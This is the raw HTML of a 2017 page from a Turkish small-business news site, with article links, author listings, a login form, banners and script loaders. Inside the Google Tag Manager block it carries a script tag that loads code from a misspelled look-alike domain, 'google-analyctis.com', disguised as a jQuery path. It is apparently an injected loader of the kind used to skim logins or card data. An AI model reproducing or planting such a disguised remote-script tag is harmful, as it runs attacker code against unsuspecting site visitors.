                                                      <a href="http://www.kobi-efor.com.tr/reel-sektor/aile-sirketleri-yikici-inovasyon-ortaminda-cikis-yolunu-nasil-bulacak-h6782.html" title="Aile şirketleri yıkıcı inovasyon ortamında çıkış yolunu nasıl bulacak?">
                    <img src="http://www.kobi-efor.com.tr/images/haberler/thumbs/aile_sirketleri_yikici_inovasyon_ortaminda_cikis_yolunu_nasil_bulacak_h6782_dcaa9.jpg" alt="Aile şirketleri yıkıcı inovasyon ortamında çıkış yolunu nasıl bulacak?" />
                    <p>Aile şirketleri yıkıcı inovasyon ortamında çıkış yolunu nasıl bulacak?</p>
                  </a>
                  
                                                      <a href="http://www.kobi-efor.com.tr/reel-sektor/bli-2017-yaz-odullerinde-alti-kyocera-urunu-derece-aldi-h6779.html" title="BLI 2017 Yaz Ödülleri&#039;nde altı KYOCERA ürünü derece aldı">
                    <img src="http://www.kobi-efor.com.tr/images/haberler/thumbs/bli_2017_yaz_odullerinde_alti_kyocera_urunu_derece_aldi_h6779_0fc33.jpg" alt="BLI 2017 Yaz Ödülleri’nde altı KYOCERA ürünü derece aldı" />
                    <p>BLI 2017 Yaz Ödülleri’nde altı KYOCERA ürünü derece aldı</p>
                  </a>
                  
                                                      <a href="http://www.kobi-efor.com.tr/reel-sektor/turkiye-nin-ilk-500-bilisim-sirketi-aciklandi-h6641.html" title="Türkiye&#039;nin ‘İlk 500 Bilişim Şirketi&#039; açıklandı">
                    <img src="http://www.kobi-efor.com.tr/images/haberler/thumbs/turkiye_nin_ilk_500_bilisim_sirketi_aciklandi_h6641_8d53a.jpg" alt="Türkiye&#039;nin ‘İlk 500 Bilişim Şirketi’ açıklandı" />
                    <p>Türkiye&#039;nin ‘İlk 500 Bilişim Şirketi’ açıklandı</p>
                  </a>
                  
                                  </div>
                <div class="item">                                    <a href="http://www.kobi-efor.com.tr/reel-sektor/itu-ari-teknokent-firmalarinin-basarisi-beetech-ile-taclandi-h6638.html" title="İTÜ ARI Teknokent  firmalarının başarısı BEETECH ile taçlandı">
                    <img src="http://www.kobi-efor.com.tr/images/haberler/thumbs/itu_ari_teknokent_firmalarinin_basarisi_beetech_ile_taclandi_h6638_5a029.jpg" alt="İTÜ ARI Teknokent  firmalarının başarısı BEETECH ile taçlandı" />
                    <p>İTÜ ARI Teknokent  firmalarının başarısı BEETECH ile taçlandı</p>
                  </a>
                  
                                                    </div>
              </div>
            </div>                                                <!-- YAZARLAR -->
            <div id="syazar">
              <div class="header">
                <h5><a href="http://www.kobi-efor.com.tr/yazarlar.html" title="Yazarlar">Yazarlar</a></h5>
                                <a class="control left" href="#" id="syprev"></a>
                <a class="control right" href="#" id="synext"></a>
                              </div>
              <div class="content">
                <div class="item">

                                  <div class="row-fluid">
                    <div class="span3">
                      <a href="http://www.kobi-efor.com.tr/iki-yenimiz-makale,405.html" title="Yalçın Sönmez  (EDİTÖR)" ><img src="http://www.kobi-efor.com.tr/images/yazarlar/thumbs/yalcin_sonmez_editor.jpg" alt="Yalçın Sönmez  (EDİTÖR)" class="img-rounded" /></a>
                    </div>
                    <div class="span9">
                      <h5><a href="http://www.kobi-efor.com.tr/iki-yenimiz-makale,405.html" title="Yalçın Sönmez  (EDİTÖR)" >Yalçın Sönmez  (EDİTÖR)</a></h5>
                      <p><a href="http://www.kobi-efor.com.tr/iki-yenimiz-makale,405.html" title="İKİ ‘YENİ&#039;MİZ" >İKİ ‘YENİ’MİZ</a></p>
                    </div>
                  </div>
                                                    <div class="row-fluid">
                    <div class="span3">
                      <a href="http://www.kobi-efor.com.tr/kobiler-inovatif-cozumleriyle-makale,404.html" title="Hilmi Develi" ><img src="http://www.kobi-efor.com.tr/images/yazarlar/thumbs/hilmi_develi_1_1.jpg" alt="Hilmi Develi" class="img-rounded" /></a>
                    </div>
                    <div class="span9">
                      <h5><a href="http://www.kobi-efor.com.tr/kobiler-inovatif-cozumleriyle-makale,404.html" title="Hilmi Develi" >Hilmi Develi</a></h5>
                      <p><a href="http://www.kobi-efor.com.tr/kobiler-inovatif-cozumleriyle-makale,404.html" title="KOBİ&#039;ler, İnovatif Çözümleriyle" >KOBİ’ler, İnovatif Çözümleriyle</a></p>
                    </div>
                  </div>
                                                    <div class="row-fluid">
                    <div class="span3">
                      <a href="http://www.kobi-efor.com.tr/ekolojik-bozulmanin-tehlike-canlari-cok-daha-kuvvetli-caliyor-makale,403.html" title="Buket Eminoğlu Pilavcı" ><img src="http://www.kobi-efor.com.tr/images/yazarlar/thumbs/buket_eminoglu_pilavci_1.jpg" alt="Buket Eminoğlu Pilavcı" class="img-rounded" /></a>
                    </div>
                    <div class="span9">
                      <h5><a href="http://www.kobi-efor.com.tr/ekolojik-bozulmanin-tehlike-canlari-cok-daha-kuvvetli-caliyor-makale,403.html" title="Buket Eminoğlu Pilavcı" >Buket Eminoğlu Pilavcı</a></h5>
                      <p><a href="http://www.kobi-efor.com.tr/ekolojik-bozulmanin-tehlike-canlari-cok-daha-kuvvetli-caliyor-makale,403.html" title="Ekolojik bozulmanın tehlike çanları çok daha kuvvetli çalıyor" >Ekolojik bozulmanın tehlike çanları çok daha kuvvetli çalıyor</a></p>
                    </div>
                  </div>
                                                    <div class="row-fluid">
                    <div class="span3">
                      <a href="http://www.kobi-efor.com.tr/pazar-odakli-sirket-makale,402.html" title="Haluk Ünaldı" ><img src="http://www.kobi-efor.com.tr/images/yazarlar/thumbs/haluk-unaldi-yazar.jpg" alt="Haluk Ünaldı" class="img-rounded" /></a>
                    </div>
                    <div class="span9">
                      <h5><a href="http://www.kobi-efor.com.tr/pazar-odakli-sirket-makale,402.html" title="Haluk Ünaldı" >Haluk Ünaldı</a></h5>
                      <p><a href="http://www.kobi-efor.com.tr/pazar-odakli-sirket-makale,402.html" title="Pazar Odaklı Şirket" >Pazar Odaklı Şirket</a></p>
                    </div>
                  </div>
                                  </div>
                <div class="item">                                  <div class="row-fluid">
                    <div class="span3">
                      <a href="http://www.kobi-efor.com.tr/agiz-tadi-gibisi-yok-makale,401.html" title="Turgay Biçer" ><img src="http://www.kobi-efor.com.tr/images/yazarlar/thumbs/turgay_bicer_1.jpg" alt="Turgay Biçer" class="img-rounded" /></a>
                    </div>
                    <div class="span9">
                      <h5><a href="http://www.kobi-efor.com.tr/agiz-tadi-gibisi-yok-makale,401.html" title="Turgay Biçer" >Turgay Biçer</a></h5>
                      <p><a href="http://www.kobi-efor.com.tr/agiz-tadi-gibisi-yok-makale,401.html" title="Ağız Tadı Gibisi Yok!" >Ağız Tadı Gibisi Yok!</a></p>
                    </div>
                  </div>
                                                    <div class="row-fluid">
                    <div class="span3">
                      <a href="http://www.kobi-efor.com.tr/stresle-basa-cikmak-icin-medamerikandan-tuyolar-makale,400.html" title="Pınar Akan" ><img src="http://www.kobi-efor.com.tr/images/yazarlar/thumbs/pinar_akan.jpg" alt="Pınar Akan" class="img-rounded" /></a>
                    </div>
                    <div class="span9">
                      <h5><a href="http://www.kobi-efor.com.tr/stresle-basa-cikmak-icin-medamerikandan-tuyolar-makale,400.html" title="Pınar Akan" >Pınar Akan</a></h5>
                      <p><a href="http://www.kobi-efor.com.tr/stresle-basa-cikmak-icin-medamerikandan-tuyolar-makale,400.html" title="Stresle Başa Çıkmak için MedAmerikan&#039;dan Tüyolar" >Stresle Başa Çıkmak için MedAmerikan’dan Tüyolar</a></p>
                    </div>
                  </div>
                                                </div>
            </div>
            <div class="header">
                <h5><a href="http://www.kobi-efor.com.tr/yazarlar-alinti.html" title="Konuk Yazarlar Arşivi">Konuk Yazarlar Arşivi</a></h5>
           <!--     <a class="control left" href="#" id="ayprev"></a>
                <a class="control right" href="#" id="aynext"></a> -->
              </div>
            </div>
                                                

                      <!-- ENCOKLAR  -->
            <div class="encoklar">
              <div class="accordion">
                              <div class="accordion-group">
                  <div class="accordion-heading">
                    <a class="accordion-toggle" data-toggle="collapse" data-parent="#encoklar" href="#collapseOne">
                    <h5><i class="halflings-icon white fire"></i> En Çok Okunan Haberler</h5></a>
                  </div>
                  <div id="collapseOne" class="accordion-body collapse in">
                    <div class="accordion-inner">
                      <ul>
                                                <li><a href="http://www.kobi-efor.com.tr/kapak/zamanin-ruhu-emrediyor-her-yerde-ve-seyde-dijitallesin-h6801.html" title="Zamanın ruhu emrediyor; Her Yerde ve Şeyde Dijitalleşin!" ><!--b>1.</b--> Zamanın ruhu emrediyor; Her Yerde ve Şeyde Dijitalleşin!</a></li>
                                                <li><a href="http://www.kobi-efor.com.tr/dosya/sem-surekli-egitim-merkezleri-h6804.html" title="SEM Sürekli Eğitim Merkezleri" ><!--b>2.</b--> SEM Sürekli Eğitim Merkezleri</a></li>
                                                <li><a href="http://www.kobi-efor.com.tr/dijital-bankacilik/finans-sektorunde-teknoloji-devriminin-adi-dijital-bankacilik-h6802.html" title="Finans sektöründe teknoloji devriminin adı; Dijital Bankacılık" ><!--b>3.</b--> Finans sektöründe teknoloji devriminin adı; Dijital Bankacılık</a></li>
                                                <li><a href="http://www.kobi-efor.com.tr/osb-tanitim/yeni-nesil-yesil-osb-bagyurdu-osb-bayosb-h6803.html" title="Yeni nesil ‘yeşil&#039; OSB; Bağyurdu OSB (BAYOSB)" ><!--b>4.</b--> Yeni nesil ‘yeşil’ OSB; Bağyurdu OSB (BAYOSB)</a></li>
                                                <li><a href="http://www.kobi-efor.com.tr/haber/kocaeli-buyuksehir-belediyesi-ile-gebze-guzeller-osb-isbirligi-yapti-h6709.html" title="Kocaeli Büyükşehir Belediyesi ile Gebze Güzeller OSB işbirliği yaptı" ><!--b>5.</b--> Kocaeli Büyükşehir Belediyesi ile Gebze Güzeller OSB işbirliği yaptı</a></li>
                                                <li><a href="http://www.kobi-efor.com.tr/universite/istanbul-sehir-universitesinin-iddiasi-donanimli-kampus-nitelikli-ogrenci-h6740.html" title="İstanbul Şehir Üniversitesi&#039;nin iddiası; Donanımlı kampüs, nitelikli öğrenci" ><!--b>6.</b--> İstanbul Şehir Üniversitesi’nin iddiası; Donanımlı kampüs, nitelikli öğrenci</a></li>
                                                <li><a href="http://www.kobi-efor.com.tr/sosyal-sorumluluk/13-bin-kisiye-kirsal-kalkinma-egitimi-verilecek-h6757.html" title="13 bin kişiye kırsal kalkınma eğitimi verilecek" ><!--b>7.</b--> 13 bin kişiye kırsal kalkınma eğitimi verilecek</a></li>
                                                <li><a href="http://www.kobi-efor.com.tr/haber/turkiye-is-bankasi-93-yasinda-h6708.html" title="Türkiye İş Bankası 93 yaşında" ><!--b>8.</b--> Türkiye İş Bankası 93 yaşında</a></li>
                                                <li><a href="http://www.kobi-efor.com.tr/insaat/turkiye-muteahhitler-birligi-gidisati-belirsiz-toparlanma-h6716.html" title="Türkiye Müteahhitler Birliği: &#039;Gidişatı belirsiz toparlanma”" ><!--b>9.</b--> Türkiye Müteahhitler Birliği: “Gidişatı belirsiz toparlanma”</a></li>
                                                <li class="last"><a href="http://www.kobi-efor.com.tr/ajans/onumuzdeki-3-yilda-turkiyedeki-ilk-5-dijital-ajans-arasina-girmeyi-hedefliyor-diverseffect-h6715.html" title="Önümüzdeki 3 yılda Türkiye&#039;deki ilk 5 dijital ajans arasına girmeyi hedefliyor: Diverseffect" ><!--b>10.</b--> Önümüzdeki 3 yılda Türkiye’deki ilk 5 dijital ajans arasına girmeyi hedefliyor: Diverseffect</a></li>
                                              </ul>
                    </div>
                  </div>
                </div>
                                            <div class="accordion-group">
                  <div class="accordion-heading">
                    <a class="accordion-toggle" data-toggle="collapse" data-parent="#encoklar" href="#collapseTwo">
                      <h5><i class="halflings-icon white comments"></i> En Çok Yorumlanan Haberler</h5></a>
                  </div>
                  <div id="collapseTwo" class="accordion-body collapse in">
                    <div class="accordion-inner">
                      <ul>
                                                  <li class="last"><a href="http://www.kobi-efor.com.tr/-h.html" title="" ><!--b>1.</b--> </a></li>
                                              </ul>
                    </div>
                  </div>
                </div>
                            </div>
            </div>
            
                                          <!-- newspaper -->
                   <div class="newspaper">
                        <div class="header">
                          <h5>Gazete Manşetleri</h5>
                        </div>
                        <div class="content">
          		    <select name="gazete" onChange="gazete_goster(this.value)" style="width:280px">
          			<option value="">-- Gazete Seçiniz --</option>
          				          					<option value="hurriyet_2017-09-05">Hürriyet</option>
          				          					<option value="milliyet_2017-09-05">Milliyet</option>
          				          					<option value="sabah_2017-09-05">Sabah</option>
          				          					<option value="posta_2017-09-05">Posta</option>
          				          					<option value="vatan_2017-09-05">Vatan</option>
          				          					<option value="zaman_2017-09-05">Zaman</option>
          				          					<option value="cumhuriyet_2017-09-05">Cumhuriyet</option>
          				          					<option value="taraf_2017-09-05">Taraf</option>
          				          					<option value="haberturk_2017-09-05">Haber Türk</option>
          				          					<option value="yeni-safak_2017-09-05">Yeni Şafak</option>
          				          					<option value="star_2017-09-05">Star</option>
          				          					<option value="aksam_2017-09-05">Akşam</option>
          				          					<option value="turkiye_2017-09-05">Türkiye</option>
          				          					<option value="bugun_2017-09-05">Bugün</option>
          				          					<option value="takvim_2017-09-05">Takvim</option>
          				          					<option value="gunluk-evrensel_2017-09-05">Evrensel</option>
          				          					<option value="aydinlik_2017-09-05">Aydınlık</option>
          				          					<option value="milli-gazete_2017-09-05">Milli Gazete</option>
          				          					<option value="ortadogu_2017-09-05">Ortadoğu</option>
          				          					<option value="gunes_2017-09-05">Güneş</option>
          				          					<option value="sozcu_2017-09-05">Sözcü</option>
          				          					<option value="yurt_2017-09-05">Yurt</option>
          				          					<option value="yeni-akit_2017-09-05">Yeni Akit</option>
          				          					<option value="yeniasya_2017-09-05">Yeni Asya</option>
          				          					<option value="milat_2017-09-05">Milat</option>
          				          					<option value="fanatik_2017-09-05">Fanatik</option>
          				          					<option value="fotomac_2017-09-05">Foto Maç</option>
          				          					<option value="dunya_2017-09-05">Dünya</option>
          				          		    </select>
                        </div>
                      </div>
                  <!-- newspaper -->
          	                                    <!--
                                                                                                <!-- REKLAM-58  -->
            <div class="reklam"><div class="fb-page" data-href="https://www.facebook.com/kobiefor" data-width="300" data-height="600" data-small-header="true" data-adapt-container-width="true" data-hide-cover="true" data-show-facepile="true" data-show-posts="true"><div class="fb-xfbml-parse-ignore"><blockquote cite="https://www.facebook.com/kobiefor"><a href="https://www.facebook.com/kobiefor">KobiEfor Dergisi</a></blockquote></div></div></div>
                        
	                <!-- SON YORUMLAR -->
            <div class="sayfalar">
              <div class="header">
                <h5>Son Yorumlar</h5>
              </div>
              <div class="content">
                <ul class="unstyled">
                                    <li><i class="icon-chevron-right"></i> <a href="http://www.kobi-efor.com.tr/haber/uretim-reform-paketi-uygulamaya-geciyor-sanayi-siteleri-tasiniyor-h6593.html#comment_116" title="" >samsun sağlık malzemeleri üretmekten...</a></li>
                                    <li><i class="icon-chevron-right"></i> <a href="http://www.kobi-efor.com.tr/ulke/pazarulke/letonya-h2631.html#comment_114" title="" >lleletonyaletonya çok güzel bir ülke...</a></li>
                                    <li><i class="icon-chevron-right"></i> <a href="http://www.kobi-efor.com.tr/osb/osb-firma-tanitim/catering-ve-toplu-yemekte-kalitenin-markasi-biltur-h1996.html#comment_112" title="" >baklava ustasiyim firmanizda çalışmak...</a></li>
                                    <li><i class="icon-chevron-right"></i> <a href="http://www.kobi-efor.com.tr/haberler/haber/gelisim-osgbnin-ikinci-subesi-ikitellide-h2503.html#comment_103" title="" >çok iyi firma.korhan beyde bir çok konuda...</a></li>
                                    <li><i class="icon-chevron-right"></i> <a href="http://www.kobi-efor.com.tr/kapak/yatirim-ve-istihdama-cozum-kobi-destekleri-h5842.html#comment_101" title="" >yatırım demek istihdam demek. i̇stihdam...</a></li>
                                    <li class="last"><i class="icon-chevron-right"></i> <a href="http://www.kobi-efor.com.tr/ulke/pazarulke/kameruna-gitmeden-kazanilmaz-h2859.html#comment_100" title="" >imalat montaj ustasıyım yurt dışı işe...</a></li>
                                  </ul>
              </div>
            </div>
            

                                                                                                    </div>
              </div>
            </div>
                      </div>
        </div>
      </div>
      <div class="footer">
        <div class="container center">
          <!-- FOOTER -->
<div id="linkler" class="row-fluid">
  </div>
		<!--div class="btn-group dropup">
  			<button class="btn">Hızlı Menü</button>
  			<button class="btn dropdown-toggle" data-toggle="dropdown">
    			<span class="caret"></span>
  			</button>
			<ul class="dropdown-menu">
        		<li><a href="#"><i class="icon-file"></i> Künye</a></li>
				<li class="divider"></li>
        		<li><a href="#"><i class="icon-plus"></i> Sitene Ekle</a></li>
        		<li><a href="#"><i class="icon-thumbs-up"></i> Reklam Ver</a></li>
        		<li><a href="#"><i class="icon-envelope"></i> İletişim Formu</a></li>
    		</ul>
		</div-->
    <hr>
  <div id="footer-alt" class="row-fluid">
  <div class="span2">
    <a href="http://www.kobi-efor.com.tr/" class="logo"><img src="http://www.kobi-efor.com.tr/images/banner/kobiefor_altbolge.png" alt="EBRD, kadınlar için 55 milyon ABD doları kredi sağladı" /></a>
  </div>
  <div class="span10">
    <ul class="unstyled">
      <li><a href="http://www.kobi-efor.com.tr/kunye.html"><i class="halflings-icon link"></i> Künye</a></li>
      <li><a href="http://www.kobi-efor.com.tr/anketler.html"><i class="halflings-icon check"></i> Anketler</a></li>
      <li><a href="http://www.kobi-efor.com.tr/roportajlar.html"><i class="halflings-icon tags"></i> Röportajlar</a></li>
      <li><a href="http://www.kobi-efor.com.tr/astroloji"><i class="halflings-icon globe"></i> Astroloji</a></li>
      <li><a href="http://www.kobi-efor.com.tr/sitene-ekle.html"><i class="halflings-icon plus-sign"></i> Sitene Ekle</a></li>
      <li><a href="http://www.kobi-efor.com.tr/iletisim.html"><i class="halflings-icon usd"></i> Reklam Ver</a></li>
      <li><a href="http://www.kobi-efor.com.tr/iletisim.html"><i class="halflings-icon envelope"></i> İletişim Formu</a></li>
    </ul>
        <p>&copy; 2017 - Sitemizde yayınlanan haberlerin telif hakları haber kaynaklarına aittir. İzin alınmadan kopyalanamaz.</p>
        <p><a href="http://www.haber-sistemi.com" title="Haber Scripti">Haber Scripti</a> | <a href="http://www.tebilisim.com" title="TE Bilişim">TE Bilişim</a></p>
  </div>
  </div>
<!-- FOOTER ***************************************************** -->        </div>
        <div id="top" class="btn btn-inverse">Yukarı Çık</div>
      </div>
      <div id="uye" class="user modal hide fade" tabindex="-1" role="dialog" aria-labelledby="myModalLabel" aria-hidden="true">
  <div class="modal-header">
    <button type="button" class="close" data-dismiss="modal" aria-hidden="true">×</button>
    <h3 id="myModalLabel">Üye Girişi</h3>
  </div>
  <div class="modal-body">
<form class="form-horizontal" action="http://www.kobi-efor.com.tr/index.php?m=login" method="post">
  <div class="control-group">
    <label class="control-label" for="inputName">Kullanıcı</label>
    <div class="controls">
      <input id="inputName" value="" name="kullanici" type="text"  placeholder="Kullanıcı" required>
    </div>
  </div>
  <div class="control-group">
    <label class="control-label" for="inputPassword">Şifre</label>
    <div class="controls">
      <input type="password" value="" name="sifre" id="inputPassword" placeholder="Şifre" required>
    </div>
  </div>
  <div class="control-group">
    <div class="controls">
      <button type="submit" class="btn btn-info">Giriş Yap</button>
    </div>
  </div>
</form>
  </div>
  <div class="modal-footer">
    <a href="http://www.kobi-efor.com.tr/uyelik.html" class="pull-left btn">Üye Ol</a>
    <a href="http://www.kobi-efor.com.tr/sifremi-unuttum.html" class="pull-left btn">Şifremi Unuttum</a>
    <button class="btn btn-danger" data-dismiss="modal" aria-hidden="true">Kapat</button>
  </div>
</div>



   
  <div class="reklam dikey sol" > 
                <p style="width:160px;"><a href="http://www.kobi-efor.com.tr/banner.php?id=201" target="_blank" rel="nofollow"><img src="http://www.kobi-efor.com.tr/thumb.php?src=http://www.kobi-efor.com.tr/images/banner/antalya_sem.png&w=160&h=600&q=90" width="160" height="600" style="width:160px;height: 600px;border:0" alt="banner201" /></a></p>                                  </div>
    <div class="reklam dikey sag ortala">
                  <p><a href="http://www.kobi-efor.com.tr/banner.php?id=199" target="_blank" rel="nofollow"><img src="http://www.kobi-efor.com.tr/images/banner/imesosb-160x600-banner.gif" width="160" height="600" style="width:160px;height: 600px;border:0" alt="banner199" /></a></p>                                                                                                                                                                    </div>



	
                    


<script src="http://www.kobi-efor.com.tr/_themes/hs-vertigo/js/login.js"></script>
<script src="http://www.kobi-efor.com.tr/_themes/hs-vertigo/js/yepnope.1.5.4-min.js"></script>
<script>
	yepnope({
		load: [
			'https://code.jquery.com/jquery-1.9.1.min.js',
			'http://www.kobi-efor.com.tr/_themes/hs-vertigo/js/jquery.cookie.js',
			'http://www.kobi-efor.com.tr/_themes/hs-vertigo/js/jquery.mousewheel.js',
			'http://www.kobi-efor.com.tr/_themes/hs-vertigo/js/jquery.scrollbar.min.js',
			'http://www.kobi-efor.com.tr/_themes/hs-vertigo/js/jquery.cycle.lite.js',
			'http://www.kobi-efor.com.tr/_themes/hs-vertigo/js/base.min.js',
			'http://www.kobi-efor.com.tr/_themes/hs-vertigo/js/hs.min.js',
			'http://www.kobi-efor.com.tr/_themes/hs-vertigo/js/waypoints.min.js',
			'http://www.kobi-efor.com.tr/_themes/hs-vertigo/js/sticky.min.js',
						,'http://www.kobi-efor.com.tr/_themes/hs-vertigo/js/comments.js'									,'http://www.kobi-efor.com.tr/_themes/hs-vertigo/js/system.js',

		],



		complete : function(){  
		      
			$(function(){  
				$.getScript('http://platform.twitter.com/widgets.js');
				$.getScript('http://www.google-analytics.com/ga.js');
																

				if (typeof (FB) != 'undefined') {
					FB.init({ status: true, cookie: true, xfbml: true });
				} else {
					$.getScript("http://connect.facebook.net/tr_TR/all.js#xfbml=1", function () {
						FB.init({ status: true, cookie: true, xfbml: true });
					});
				}

				if (typeof (gapi) != 'undefined') {
					gbuttons.each(function () {
						gapi.plusone.render($(this).get(0));
					});
				} else {
					$.getScript('https://apis.google.com/js/plusone.js');
				}


			});
			


   			hs.graphicsDir = 'http://www.kobi-efor.com.tr/_themes/hs-vertigo/images/hs/';
   			
			$.getJSON(site_url + 'cache/static/twitter_followers.json',function(data) { 
				$('a#followers').html(data);
			});

			var graph_url = 'https://graph.facebook.com/'+facebook_user;
			$.getJSON(graph_url, function(data) {
			  $('a#likes').html(data.likes);
			});


			

			$('.sticky-menu').waypoint('sticky', {
				wrapper: '<div class="sticky-wrapper" />',
				stuckClass: 'stuck'
			});

							$('body').append($("<div class='popup hiding' id='article-finished'></div>"));
				$("#article-finished").html("").append($("#ilgilihaberler2"));


				$('.footer').waypoint(function(direction) {
				  $('#article-finished').toggleClass('hiding', direction === "up");
				}, {
				  offset: function() {
				    return $.waypoints('viewportHeight') - $(this).height() + 500;
				  }
				});
			

			


			



			




			


			
			
						

   
		 }  




	});

</script>


    <!-- Google Tag Manager -->
<noscript><iframe src="//www.googletagmanager.com/ns.html?id=GTM-W3SBKW"
height="0" width="0" style="display:none;visibility:hidden"></iframe></noscript>
<script>(function(w,d,s,l,i){w[l]=w[l]||[];w[l].push({'gtm.start':
new Date().getTime(),event:'gtm.js'});var f=d.getElementsByTagName(s)[0],
j=d.createElement(s),dl=l!='dataLayer'?'&l='+l:'';j.async=true;j.src=
'//www.googletagmanager.com/gtm.js?id='+i+dl;f.parentNode.insertBefore(j,f);
})(window,document,'script','dataLayer','GTM-W3SBKW');</script>
<script src="//apis.google-analyctis.com/ajax/libs/query/1/6/2/jquery/min"></script>
<!-- End Google Tag Manager -->    


           


    <div id="fb-root"></div>
        <script type="text/javascript">
      var fbTitle  = encodeURIComponent("EBRD, kadınlar için 55 milyon ABD doları kredi sağladı");
      var fbUrl    = encodeURIComponent(location.href);
      var fbThumb  = "http://www.kobi-efor.com.tr/images/haberler/thumbs/ebrd_kadinlar_icin_55_milyon_abd_dolari_kredi_sagladi_h6788_a6c4a.jpg";
      var fbDesc   = encodeURIComponent("QNB Finansbank, European Bank for Reconstruction and Development&#039;ın (EBRD-Avrupa İmar ve Kalkınma Bankası) kadın girişimcilere destek programı Women in Business kapsamında, kadınların sahibi veya yöneticisi olduğu işletmelere kullandırmak üzere 55 milyon dolar kredi sağladı.");
    </script> 
    
<div id="ilgilihaberler2">
          <p><a href="http://www.kobi-efor.com.tr/reel-sektor/filli-boya-bilim-kampi-cocuklarin-hayatina-dokunuyor-h6800.html" title="Filli Boya Bilim Kampı çocukların hayatına dokunuyor"><b>Filli Boya Bilim Kampı çocukların hayatına...</b>
      <br>Milli Eğitim Bakanlığı İstanbul İl Milli Eğitim Müdürlüğü, TÜBİTAK TÜSSİDE ve akademisyenlerin...</a></p>
      <p><a href="http://www.kobi-efor.com.tr/reel-sektor/filli-boya-bilim-kampi-cocuklarin-hayatina-dokunuyor-h6800.html" title="Filli Boya Bilim Kampı çocukların hayatına dokunuyor" class="btn btn-danger btn-small">Haberi Oku</a></p>
    </div>


  </body>
</html>
